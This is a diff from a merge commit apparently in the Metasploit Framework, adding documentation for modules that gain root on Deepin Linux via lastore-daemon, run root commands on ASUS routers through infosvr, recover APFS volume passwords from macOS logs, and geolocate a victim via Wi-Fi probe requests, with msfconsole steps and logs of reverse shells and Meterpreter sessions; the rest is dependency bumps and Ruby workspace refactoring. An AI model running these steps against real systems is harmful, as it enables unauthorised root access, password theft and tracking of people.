Merge remote-tracking branch 'upstream/master' into feature/drupal
commit
5be4526085
14
Gemfile.lock
14
Gemfile.lock
|
@ -56,7 +56,7 @@ PATH
|
||||||
rex-socket
|
rex-socket
|
||||||
rex-sslscan
|
rex-sslscan
|
||||||
rex-struct2
|
rex-struct2
|
||||||
rex-text (< 0.2.18)
|
rex-text
|
||||||
rex-zip
|
rex-zip
|
||||||
ruby-macho
|
ruby-macho
|
||||||
ruby_smb
|
ruby_smb
|
||||||
|
@ -107,7 +107,7 @@ GEM
|
||||||
arel (6.0.4)
|
arel (6.0.4)
|
||||||
arel-helpers (2.6.1)
|
arel-helpers (2.6.1)
|
||||||
activerecord (>= 3.1.0, < 6)
|
activerecord (>= 3.1.0, < 6)
|
||||||
backports (3.11.2)
|
backports (3.11.3)
|
||||||
bcrypt (3.1.11)
|
bcrypt (3.1.11)
|
||||||
bcrypt_pbkdf (1.0.0)
|
bcrypt_pbkdf (1.0.0)
|
||||||
bindata (2.4.3)
|
bindata (2.4.3)
|
||||||
|
@ -129,7 +129,7 @@ GEM
|
||||||
railties (>= 3.0.0)
|
railties (>= 3.0.0)
|
||||||
faker (1.8.7)
|
faker (1.8.7)
|
||||||
i18n (>= 0.7)
|
i18n (>= 0.7)
|
||||||
faraday (0.14.0)
|
faraday (0.15.0)
|
||||||
multipart-post (>= 1.2, < 3)
|
multipart-post (>= 1.2, < 3)
|
||||||
filesize (0.1.1)
|
filesize (0.1.1)
|
||||||
fivemat (1.3.6)
|
fivemat (1.3.6)
|
||||||
|
@ -201,8 +201,8 @@ GEM
|
||||||
ttfunk
|
ttfunk
|
||||||
pg (0.20.0)
|
pg (0.20.0)
|
||||||
pg_array_parser (0.0.9)
|
pg_array_parser (0.0.9)
|
||||||
postgres_ext (3.0.0)
|
postgres_ext (3.0.1)
|
||||||
activerecord (>= 4.0.0)
|
activerecord (~> 4.0)
|
||||||
arel (>= 4.0.1)
|
arel (>= 4.0.1)
|
||||||
pg_array_parser (~> 0.0.9)
|
pg_array_parser (~> 0.0.9)
|
||||||
pry (0.11.3)
|
pry (0.11.3)
|
||||||
|
@ -229,7 +229,7 @@ GEM
|
||||||
thor (>= 0.18.1, < 2.0)
|
thor (>= 0.18.1, < 2.0)
|
||||||
rake (12.3.1)
|
rake (12.3.1)
|
||||||
rb-readline (0.5.5)
|
rb-readline (0.5.5)
|
||||||
recog (2.1.18)
|
recog (2.1.19)
|
||||||
nokogiri
|
nokogiri
|
||||||
redcarpet (3.4.0)
|
redcarpet (3.4.0)
|
||||||
rex-arch (0.1.13)
|
rex-arch (0.1.13)
|
||||||
|
@ -275,7 +275,7 @@ GEM
|
||||||
rex-socket
|
rex-socket
|
||||||
rex-text
|
rex-text
|
||||||
rex-struct2 (0.1.2)
|
rex-struct2 (0.1.2)
|
||||||
rex-text (0.2.17)
|
rex-text (0.2.20)
|
||||||
rex-zip (0.1.3)
|
rex-zip (0.1.3)
|
||||||
rex-text
|
rex-text
|
||||||
rkelly-remix (0.0.7)
|
rkelly-remix (0.0.7)
|
||||||
|
|
|
@ -0,0 +1,101 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This module attempts to gain root privileges on [Deepin Linux](https://www.deepin.org/en/) systems
|
||||||
|
by using `lastore-daemon` to install a package. It may cause audio and/or graphical signals confirming
|
||||||
|
the installation of the payload package.
|
||||||
|
|
||||||
|
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
The `lastore-daemon` D-Bus configuration on Deepin Linux 15.5 permits any
|
||||||
|
user in the `sudo` group to install arbitrary system packages without
|
||||||
|
providing a password, resulting in code execution as root. By default,
|
||||||
|
the first user created on the system is a member of the `sudo` group.
|
||||||
|
|
||||||
|
The D-Bus configuration in `/usr/share/dbus-1/system.d/com.deepin.lastore.conf`
|
||||||
|
permits users of the `sudo` group to execute arbitrary methods on the
|
||||||
|
`com.deepin.lastore` interface, as shown below:
|
||||||
|
|
||||||
|
```xml
|
||||||
|
<!-- Only root can own the service -->
|
||||||
|
<policy user="root">
|
||||||
|
<allow own="com.deepin.lastore"/>
|
||||||
|
<allow send_destination="com.deepin.lastore"/>
|
||||||
|
</policy>
|
||||||
|
|
||||||
|
<!-- Allow sudo group to invoke methods on the interfaces -->
|
||||||
|
<policy group="sudo">
|
||||||
|
<allow own="com.deepin.lastore"/>
|
||||||
|
<allow send_destination="com.deepin.lastore"/>
|
||||||
|
</policy>
|
||||||
|
```
|
||||||
|
|
||||||
|
This module has been tested successfully with lastore-daemon version
|
||||||
|
0.9.53-1 on Deepin Linux 15.5 (x64).
|
||||||
|
|
||||||
|
Deepin Linux is available here:
|
||||||
|
|
||||||
|
* https://www.deepin.org/en/mirrors/releases/
|
||||||
|
|
||||||
|
`lastore-daemon` source repository is available here:
|
||||||
|
|
||||||
|
* https://cr.deepin.io/#/admin/projects/lastore/lastore-daemon
|
||||||
|
* https://github.com/linuxdeepin/lastore-daemon/
|
||||||
|
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Start `msfconsole`
|
||||||
|
2. Get a session
|
||||||
|
3. `use exploit/linux/local/lastore_daemon_dbus_priv_esc`
|
||||||
|
4. `set SESSION [SESSION]`
|
||||||
|
5. `check`
|
||||||
|
6. `run`
|
||||||
|
7. You should get a new *root* session
|
||||||
|
|
||||||
|
|
||||||
|
## Options
|
||||||
|
|
||||||
|
**SESSION**
|
||||||
|
|
||||||
|
Which session to use, which can be viewed with `sessions`
|
||||||
|
|
||||||
|
**WritableDir**
|
||||||
|
|
||||||
|
A writable directory file system path. (default: `/tmp`)
|
||||||
|
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use exploit/linux/local/lastore_daemon_dbus_priv_esc
|
||||||
|
msf exploit(linux/local/lastore_daemon_dbus_priv_esc) > set session 1
|
||||||
|
session => 1
|
||||||
|
msf exploit(linux/local/lastore_daemon_dbus_priv_esc) > run
|
||||||
|
|
||||||
|
[!] SESSION may not be compatible with this module.
|
||||||
|
[*] Started reverse TCP handler on 172.16.191.188:4444
|
||||||
|
[*] Building package...
|
||||||
|
[*] Writing '/tmp/.NNhJWRPZdd/DEBIAN/control' (98 bytes) ...
|
||||||
|
[*] Writing '/tmp/.NNhJWRPZdd/DEBIAN/postinst' (28 bytes) ...
|
||||||
|
[*] Uploading payload...
|
||||||
|
[*] Writing '/tmp/.1sZZ46ozIH' (207 bytes) ...
|
||||||
|
[*] Installing package...
|
||||||
|
[*] Sending stage (857352 bytes) to 172.16.191.200
|
||||||
|
[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.200:51464) at 2018-03-24 18:45:29 -0400
|
||||||
|
[+] Deleted /tmp/.NNhJWRPZdd/DEBIAN/control
|
||||||
|
[+] Deleted /tmp/.NNhJWRPZdd/DEBIAN/postinst
|
||||||
|
[+] Deleted /tmp/.1sZZ46ozIH
|
||||||
|
[+] Deleted /tmp/.NNhJWRPZdd/DEBIAN
|
||||||
|
[*] Removing package...
|
||||||
|
|
||||||
|
meterpreter > getuid
|
||||||
|
Server username: uid=0, gid=0, euid=0, egid=0
|
||||||
|
meterpreter > sysinfo
|
||||||
|
Computer : 172.16.191.200
|
||||||
|
OS : Deepin 15.5 (Linux 4.9.0-deepin13-amd64)
|
||||||
|
Architecture : x64
|
||||||
|
BuildTuple : i486-linux-musl
|
||||||
|
Meterpreter : x86/linux
|
||||||
|
```
|
||||||
|
|
|
@ -0,0 +1,78 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This module exploits an authentication bypass vulnerability in the infosvr service running on various ASUS routers to execute arbitrary commands as `root`.
|
||||||
|
|
||||||
|
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
The ASUS infosvr service is enabled by default on various models of ASUS routers and listens on the LAN interface on UDP port 9999. Unpatched versions of this service allow unauthenticated remote command execution as the `root` user.
|
||||||
|
|
||||||
|
This module launches the BusyBox Telnet daemon on the port specified in the `TelnetPort` option to gain an interactive remote shell.
|
||||||
|
|
||||||
|
This module was tested successfully on an ASUS RT-N12E with firmware version 2.0.0.35.
|
||||||
|
|
||||||
|
Numerous ASUS models are [reportedly affected](https://github.com/jduck/asus-cmd), but untested.
|
||||||
|
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Start `msfconsole`
|
||||||
|
2. `use exploit/linux/misc/asus_infosvr_auth_bypass_exec`
|
||||||
|
3. `set RHOST [IP]`
|
||||||
|
4. `run`
|
||||||
|
5. You should get a *root* session
|
||||||
|
|
||||||
|
|
||||||
|
## Options
|
||||||
|
|
||||||
|
|
||||||
|
**TelnetPort**
|
||||||
|
|
||||||
|
The port for Telnetd to bind (default: `4444`)
|
||||||
|
|
||||||
|
**TelnetTimeout**
|
||||||
|
|
||||||
|
The number of seconds to wait for connection to telnet (default: `10`)
|
||||||
|
|
||||||
|
**TelnetBannerTimeout**
|
||||||
|
|
||||||
|
The number of seconds to wait for the telnet banner (default: `25`)
|
||||||
|
|
||||||
|
**CommandShellCleanupCommand**
|
||||||
|
|
||||||
|
A command to run before the session is closed (default: `exit`)
|
||||||
|
|
||||||
|
If the session is killed (CTRL+C) rather than exiting cleanly,
|
||||||
|
the telnet port remains open, but is unresponsive, and prevents
|
||||||
|
re-exploitation until the device is rebooted.
|
||||||
|
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use exploit/linux/misc/asus_infosvr_auth_bypass_exec
|
||||||
|
msf exploit(linux/misc/asus_infosvr_auth_bypass_exec) > set rhost 10.1.1.1
|
||||||
|
rhost => 10.1.1.1
|
||||||
|
msf exploit(linux/misc/asus_infosvr_auth_bypass_exec) > set telnetport 4444
|
||||||
|
telnetport => 4444
|
||||||
|
msf exploit(linux/misc/asus_infosvr_auth_bypass_exec) > set verbose true
|
||||||
|
verbose => true
|
||||||
|
msf exploit(linux/misc/asus_infosvr_auth_bypass_exec) > run
|
||||||
|
|
||||||
|
[*] 10.1.1.1 - Starting telnetd on port 4444...
|
||||||
|
[*] 10.1.1.1 - Waiting for telnet service to start on port 4444...
|
||||||
|
[*] 10.1.1.1 - Connecting to 10.1.1.1:4444...
|
||||||
|
[*] 10.1.1.1 - Trying to establish a telnet session...
|
||||||
|
[+] 10.1.1.1 - Telnet session successfully established...
|
||||||
|
[*] Found shell.
|
||||||
|
[*] Command shell session 1 opened (10.1.1.197:42875 -> 10.1.1.1:4444) at 2017-11-28 07:38:37 -0500
|
||||||
|
|
||||||
|
id
|
||||||
|
/bin/sh: id: not found
|
||||||
|
# cat /proc/version
|
||||||
|
cat /proc/version
|
||||||
|
Linux version 2.6.30.9 (root@wireless-desktop) (gcc version 3.4.6-1.3.6) #2 Thu Sep 18 18:12:23 CST 2014
|
||||||
|
# exit
|
||||||
|
exit
|
||||||
|
```
|
||||||
|
|
|
@ -0,0 +1,43 @@
|
||||||
|
This module uses a vulnerability in macOS High Sierra's `log` command. It uses the logs of the Disk Utility app to recover the password of an APFS encrypted volume from when it was created.
|
||||||
|
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
* macOS 10.13.0
|
||||||
|
* macOS 10.13.1
|
||||||
|
* macOS 10.13.2
|
||||||
|
* macOS 10.13.3*
|
||||||
|
|
||||||
|
|
||||||
|
\* On macOS 10.13.3, the password can only be recovered if the drive was encrypted before the system upgrade to 10.13.3. See [here](https://www.mac4n6.com/blog/2018/3/21/uh-oh-unified-logs-in-high-sierra-1013-show-plaintext-password-for-apfs-encrypted-external-volumes-via-disk-utilityapp) for more info
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
Example steps in this format (is also in the PR):
|
||||||
|
|
||||||
|
1. Start `msfconsole`
|
||||||
|
2. Do: `use post/osx/gather/apfs_encrypted_volume_passwd`
|
||||||
|
3. Do: set the `MOUNT_PATH` option if needed
|
||||||
|
4. Do: ```run```
|
||||||
|
5. You should get the password
|
||||||
|
|
||||||
|
## Options
|
||||||
|
|
||||||
|
**MOUNT_PATH**
|
||||||
|
|
||||||
|
`MOUNT_PATH` is the path on the macOS system where the encrypted drive is (or was) mounted. This is *not* the path under `/Volumes`
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
Typical run against an OSX session, after creating a new APFS disk using Disk Utility:
|
||||||
|
|
||||||
|
```
|
||||||
|
msf5 exploit(multi/handler) > use post/osx/gather/apfs_encrypted_volume_passwd
|
||||||
|
msf5 post(osx/gather/apfs_encrypted_volume_passwd) > set SESSION -1
|
||||||
|
SESSION => -1
|
||||||
|
msf5 post(osx/gather/apfs_encrypted_volume_passwd) > exploit
|
||||||
|
|
||||||
|
[+] APFS command found: newfs_apfs -i -E -S aa -v Untitled disk2s2 .
|
||||||
|
[+] APFS command found: newfs_apfs -A -e -E -S secretpassword -v Untitled disk2 .
|
||||||
|
[*] Post module execution completed
|
||||||
|
msf5 post(osx/gather/apfs_encrypted_volume_passwd) >
|
||||||
|
```
|
|
@ -0,0 +1,113 @@
|
||||||
|
## Description
|
||||||
|
The module send probe request packets through the wlan interfaces. The user can configure the message to be sent
|
||||||
|
(embedded in the SSID field) with a max length of 32 bytes and the time spent in seconds sending those packets
|
||||||
|
(considering a sleep of 10 seconds between each probe request).
|
||||||
|
|
||||||
|
The module borrows most of its code from the @thelightcosine wlan_* modules (everything revolves around the
|
||||||
|
wlanscan API and the DOT11_SSID structure).
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
This post module uses the remote victim's wireless card to beacon a specific SSID, allowing an attacker to
|
||||||
|
geolocate him or her during an engagement.
|
||||||
|
|
||||||
|
## Verification steps:
|
||||||
|
### Run the module on a remote computer:
|
||||||
|
```
|
||||||
|
msf exploit(ms17_010_eternalblue) > use exploit/multi/handler
|
||||||
|
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
|
||||||
|
payload => windows/meterpreter/reverse_tcp
|
||||||
|
msf exploit(handler) > set lhost 192.168.135.111
|
||||||
|
lhost => 192.168.135.111
|
||||||
|
msf exploit(handler) > set lport 4567
|
||||||
|
lport => 4567
|
||||||
|
msf exploit(handler) > run
|
||||||
|
|
||||||
|
[*] Started reverse TCP handler on 192.168.135.111:4567
|
||||||
|
[*] Starting the payload handler...
|
||||||
|
[*] Sending stage (957487 bytes) to 192.168.135.157
|
||||||
|
[*] Meterpreter session 1 opened (192.168.135.111:4567 -> 192.168.135.157:50661) at 2018-04-20 13:20:34 -0500
|
||||||
|
|
||||||
|
meterpreter > sysinfo
|
||||||
|
Computer : WIN10X64-1703
|
||||||
|
OS : Windows 10 (Build 15063).
|
||||||
|
Architecture : x64
|
||||||
|
System Language : en_US
|
||||||
|
Domain : WORKGROUP
|
||||||
|
Logged On Users : 2
|
||||||
|
Meterpreter : x86/windows
|
||||||
|
meterpreter > background
|
||||||
|
[*] Backgrounding session 1...
|
||||||
|
msf exploit(handler) > use post/windows/wlan/wlan_probe_request
|
||||||
|
msf post(wlan_probe_request) > set ssid "TEST"
|
||||||
|
ssid => TEST
|
||||||
|
msf post(wlan_probe_request) > set timeout 300
|
||||||
|
timeout => 300
|
||||||
|
msf post(wlan_probe_request) > set session 1
|
||||||
|
session => 1
|
||||||
|
msf post(wlan_probe_request) > run
|
||||||
|
|
||||||
|
[*] Wlan interfaces found: 1
|
||||||
|
[*] Sending probe requests for 300 seconds
|
||||||
|
^C[-] Post interrupted by the console user
|
||||||
|
[*] Post module execution completed
|
||||||
|
msf post(wlan_probe_request) >
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
### On another computer, use probemon to listen for the SSID:
|
||||||
|
```
|
||||||
|
tmoose@ubuntu:~/rapid7$ ifconfig -a
|
||||||
|
.
|
||||||
|
.
|
||||||
|
.
|
||||||
|
wlx00c0ca6d1287 Link encap:Ethernet HWaddr 00:00:00:00:00:00
|
||||||
|
UP BROADCAST MULTICAST MTU:1500 Metric:1
|
||||||
|
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
|
||||||
|
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
|
||||||
|
collisions:0 txqueuelen:1000
|
||||||
|
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
|
||||||
|
|
||||||
|
tmoose@ubuntu:~/rapid7$ sudo airmon-ng start wlx00c0ca6d1287
|
||||||
|
|
||||||
|
|
||||||
|
Found 6 processes that could cause trouble.
|
||||||
|
If airodump-ng, aireplay-ng or airtun-ng stops working after
|
||||||
|
a short period of time, you may want to kill (some of) them!
|
||||||
|
|
||||||
|
PID Name
|
||||||
|
963 NetworkManager
|
||||||
|
981 avahi-daemon
|
||||||
|
1002 avahi-daemon
|
||||||
|
1170 dhclient
|
||||||
|
1180 dhclient
|
||||||
|
1766 wpa_supplicant
|
||||||
|
|
||||||
|
|
||||||
|
Interface Chipset Driver
|
||||||
|
|
||||||
|
wlx000000000000 Realtek RTL8187L rtl8187 - [phy0]
|
||||||
|
(monitor mode enabled on mon0)
|
||||||
|
|
||||||
|
tmoose@ubuntu:~/rapid7$ cd ..
|
||||||
|
|
||||||
|
tmoose@ubuntu:~$ sudo python probemon.py -t unix -i mon0 -s -r -l | grep TEST
|
||||||
|
1524248955 74:ea:3a:8e:a1:6d TEST -59
|
||||||
|
1524248955 74:ea:3a:8e:a1:6d TEST -73
|
||||||
|
1524248955 74:ea:3a:8e:a1:6d TEST -63
|
||||||
|
1524248955 74:ea:3a:8e:a1:6d TEST -68
|
||||||
|
1524248956 74:ea:3a:8e:a1:6d TEST -74
|
||||||
|
1524248965 74:ea:3a:8e:a1:6d TEST -59
|
||||||
|
1524248965 74:ea:3a:8e:a1:6d TEST -60
|
||||||
|
1524248965 74:ea:3a:8e:a1:6d TEST -74
|
||||||
|
1524248965 74:ea:3a:8e:a1:6d TEST -73
|
||||||
|
1524248965 74:ea:3a:8e:a1:6d TEST -63
|
||||||
|
1524248965 74:ea:3a:8e:a1:6d TEST -63
|
||||||
|
1524248965 74:ea:3a:8e:a1:6d TEST -78
|
||||||
|
|
||||||
|
.
|
||||||
|
.
|
||||||
|
.
|
||||||
|
|
||||||
|
```
|
|
@ -123,6 +123,29 @@ class DataProxy
|
||||||
raise Exception, "#{ui_message}: #{exception.message}. See log for more details."
|
raise Exception, "#{ui_message}: #{exception.message}. See log for more details."
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Adds a valid workspace value to the opts hash before sending on to the data layer.
|
||||||
|
#
|
||||||
|
# @param [Hash] opts The opts hash that will be passed to the data layer.
|
||||||
|
# @param [String] wspace A specific workspace name to add to the opts hash.
|
||||||
|
# @return [Hash] The opts hash with a valid :workspace value added.
|
||||||
|
def add_opts_workspace(opts, wspace = nil)
|
||||||
|
# Some methods use the key :wspace. Let's standardize on :workspace and clean it up here.
|
||||||
|
opts[:workspace] = opts.delete(:wspace) unless opts[:wspace].nil?
|
||||||
|
|
||||||
|
# If the user passed in a specific workspace then use that in opts
|
||||||
|
opts[:workspace] = wspace if wspace
|
||||||
|
|
||||||
|
# We only want to pass the workspace name, so grab it if it is currently an object.
|
||||||
|
if opts[:workspace] && opts[:workspace].is_a?(::Mdm::Workspace)
|
||||||
|
opts[:workspace] = opts[:workspace].name
|
||||||
|
end
|
||||||
|
|
||||||
|
# If we still don't have a :workspace value, just set it to the current workspace.
|
||||||
|
opts[:workspace] = workspace.name if opts[:workspace].nil?
|
||||||
|
|
||||||
|
opts
|
||||||
|
end
|
||||||
|
|
||||||
#######
|
#######
|
||||||
private
|
private
|
||||||
#######
|
#######
|
||||||
|
|
|
@ -2,7 +2,7 @@ module CredentialDataProxy
|
||||||
|
|
||||||
def create_credential(opts)
|
def create_credential(opts)
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service()
|
data_service = self.get_data_service
|
||||||
data_service.create_credential(opts)
|
data_service.create_credential(opts)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, "Problem creating credential")
|
self.log_error(e, "Problem creating credential")
|
||||||
|
@ -12,6 +12,7 @@ module CredentialDataProxy
|
||||||
def creds(opts = {})
|
def creds(opts = {})
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service
|
data_service = self.get_data_service
|
||||||
|
add_opts_workspace(opts)
|
||||||
data_service.creds(opts)
|
data_service.creds(opts)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, "Problem retrieving credentials")
|
self.log_error(e, "Problem retrieving credentials")
|
||||||
|
|
|
@ -6,6 +6,7 @@ module DbExportDataProxy
|
||||||
path: path,
|
path: path,
|
||||||
format: format
|
format: format
|
||||||
}
|
}
|
||||||
|
add_opts_workspace(opts)
|
||||||
data_service.run_db_export(opts)
|
data_service.run_db_export(opts)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, "Problem generating DB Export")
|
self.log_error(e, "Problem generating DB Export")
|
||||||
|
|
|
@ -2,7 +2,8 @@ module EventDataProxy
|
||||||
|
|
||||||
def report_event(opts)
|
def report_event(opts)
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service()
|
data_service = self.get_data_service
|
||||||
|
add_opts_workspace(opts)
|
||||||
data_service.report_event(opts)
|
data_service.report_event(opts)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, "Problem reporting event")
|
self.log_error(e, "Problem reporting event")
|
||||||
|
|
|
@ -2,7 +2,7 @@ module ExploitDataProxy
|
||||||
|
|
||||||
def report_exploit_attempt(host, opts)
|
def report_exploit_attempt(host, opts)
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service()
|
data_service = self.get_data_service
|
||||||
data_service.report_exploit_attempt(host, opts)
|
data_service.report_exploit_attempt(host, opts)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, "Problem reporting exploit attempt")
|
self.log_error(e, "Problem reporting exploit attempt")
|
||||||
|
@ -11,7 +11,8 @@ module ExploitDataProxy
|
||||||
|
|
||||||
def report_exploit_failure(opts)
|
def report_exploit_failure(opts)
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service()
|
data_service = self.get_data_service
|
||||||
|
add_opts_workspace(opts)
|
||||||
data_service.report_exploit_failure(opts)
|
data_service.report_exploit_failure(opts)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, "Problem reporting exploit failure")
|
self.log_error(e, "Problem reporting exploit failure")
|
||||||
|
@ -20,7 +21,8 @@ module ExploitDataProxy
|
||||||
|
|
||||||
def report_exploit_success(opts)
|
def report_exploit_success(opts)
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service()
|
data_service = self.get_data_service
|
||||||
|
add_opts_workspace(opts)
|
||||||
data_service.report_exploit_success(opts)
|
data_service.report_exploit_success(opts)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, "Problem reporting exploit success")
|
self.log_error(e, "Problem reporting exploit success")
|
||||||
|
|
|
@ -1,10 +1,10 @@
|
||||||
module HostDataProxy
|
module HostDataProxy
|
||||||
|
|
||||||
def hosts(wspace = workspace, non_dead = false, addresses = nil, search_term = nil)
|
def hosts(wspace = workspace.name, non_dead = false, addresses = nil, search_term = nil)
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service()
|
data_service = self.get_data_service
|
||||||
opts = {}
|
opts = {}
|
||||||
opts[:wspace] = wspace
|
add_opts_workspace(opts, wspace)
|
||||||
opts[:non_dead] = non_dead
|
opts[:non_dead] = non_dead
|
||||||
opts[:address] = addresses
|
opts[:address] = addresses
|
||||||
opts[:search_term] = search_term
|
opts[:search_term] = search_term
|
||||||
|
@ -24,7 +24,8 @@ module HostDataProxy
|
||||||
return unless valid(opts)
|
return unless valid(opts)
|
||||||
|
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service()
|
data_service = self.get_data_service
|
||||||
|
add_opts_workspace(opts)
|
||||||
data_service.report_host(opts)
|
data_service.report_host(opts)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, "Problem reporting host")
|
self.log_error(e, "Problem reporting host")
|
||||||
|
@ -33,7 +34,8 @@ module HostDataProxy
|
||||||
|
|
||||||
def report_hosts(hosts)
|
def report_hosts(hosts)
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service()
|
data_service = self.get_data_service
|
||||||
|
add_opts_workspace(hosts)
|
||||||
data_service.report_hosts(hosts)
|
data_service.report_hosts(hosts)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, "Problem reporting hosts")
|
self.log_error(e, "Problem reporting hosts")
|
||||||
|
@ -42,7 +44,7 @@ module HostDataProxy
|
||||||
|
|
||||||
def update_host(opts)
|
def update_host(opts)
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service()
|
data_service = self.get_data_service
|
||||||
data_service.update_host(opts)
|
data_service.update_host(opts)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, "Problem updating host")
|
self.log_error(e, "Problem updating host")
|
||||||
|
@ -51,7 +53,7 @@ module HostDataProxy
|
||||||
|
|
||||||
def delete_host(opts)
|
def delete_host(opts)
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service()
|
data_service = self.get_data_service
|
||||||
data_service.delete_host(opts)
|
data_service.delete_host(opts)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, "Problem deleting host")
|
self.log_error(e, "Problem deleting host")
|
||||||
|
|
|
@ -2,10 +2,11 @@ module LootDataProxy
|
||||||
|
|
||||||
def report_loot(opts)
|
def report_loot(opts)
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service()
|
data_service = self.get_data_service
|
||||||
if !data_service.is_a?(Msf::DBManager)
|
if !data_service.is_a?(Msf::DBManager)
|
||||||
opts[:data] = Base64.urlsafe_encode64(opts[:data]) if opts[:data]
|
opts[:data] = Base64.urlsafe_encode64(opts[:data]) if opts[:data]
|
||||||
end
|
end
|
||||||
|
add_opts_workspace(opts)
|
||||||
data_service.report_loot(opts)
|
data_service.report_loot(opts)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, "Problem reporting loot")
|
self.log_error(e, "Problem reporting loot")
|
||||||
|
@ -21,7 +22,7 @@ module LootDataProxy
|
||||||
def loots(wspace, opts = {})
|
def loots(wspace, opts = {})
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service
|
data_service = self.get_data_service
|
||||||
opts[:wspace] = wspace
|
add_opts_workspace(opts, wspace)
|
||||||
data_service.loot(opts)
|
data_service.loot(opts)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, "Problem retrieving loot")
|
self.log_error(e, "Problem retrieving loot")
|
||||||
|
|
|
@ -2,7 +2,8 @@ module NmapDataProxy
|
||||||
|
|
||||||
def import_nmap_xml_file(args = {})
|
def import_nmap_xml_file(args = {})
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service()
|
data_service = self.get_data_service
|
||||||
|
add_opts_workspace(args)
|
||||||
data_service.import_nmap_xml_file(args)
|
data_service.import_nmap_xml_file(args)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, "Problem importing Nmap XML file")
|
self.log_error(e, "Problem importing Nmap XML file")
|
||||||
|
|
|
@ -1,10 +1,45 @@
|
||||||
module NoteDataProxy
|
module NoteDataProxy
|
||||||
|
|
||||||
|
def notes(opts)
|
||||||
|
begin
|
||||||
|
data_service = self.get_data_service
|
||||||
|
add_opts_workspace(opts)
|
||||||
|
data_service.notes(opts)
|
||||||
|
rescue Exception => e
|
||||||
|
self.log_error(e, "Problem retrieving notes")
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
# TODO: like other *DataProxy modules this currently skips the "find" part
|
||||||
|
def find_or_create_note(opts)
|
||||||
|
report_note(opts)
|
||||||
|
end
|
||||||
|
|
||||||
def report_note(opts)
|
def report_note(opts)
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service()
|
data_service = self.get_data_service
|
||||||
|
add_opts_workspace(opts)
|
||||||
data_service.report_note(opts)
|
data_service.report_note(opts)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, "Problem reporting note")
|
self.log_error(e, "Problem reporting note")
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def update_note(opts)
|
||||||
|
begin
|
||||||
|
data_service = self.get_data_service
|
||||||
|
data_service.update_note(opts)
|
||||||
|
rescue Exception => e
|
||||||
|
self.log_error(e, "Problem updating note")
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def delete_note(opts)
|
||||||
|
begin
|
||||||
|
data_service = self.get_data_service
|
||||||
|
data_service.delete_note(opts)
|
||||||
|
rescue Exception => e
|
||||||
|
self.log_error(e, "Problem deleting note")
|
||||||
|
end
|
||||||
|
end
|
||||||
end
|
end
|
|
@ -1,9 +1,9 @@
|
||||||
module ServiceDataProxy
|
module ServiceDataProxy
|
||||||
|
|
||||||
def services(wspace = workspace, opts = {})
|
def services(wspace = workspace.name, opts = {})
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service()
|
data_service = self.get_data_service
|
||||||
opts[:workspace] = wspace
|
add_opts_workspace(opts, wspace)
|
||||||
data_service.services(opts)
|
data_service.services(opts)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, 'Problem retrieving services')
|
self.log_error(e, 'Problem retrieving services')
|
||||||
|
@ -16,7 +16,8 @@ module ServiceDataProxy
|
||||||
|
|
||||||
def report_service(opts)
|
def report_service(opts)
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service()
|
data_service = self.get_data_service
|
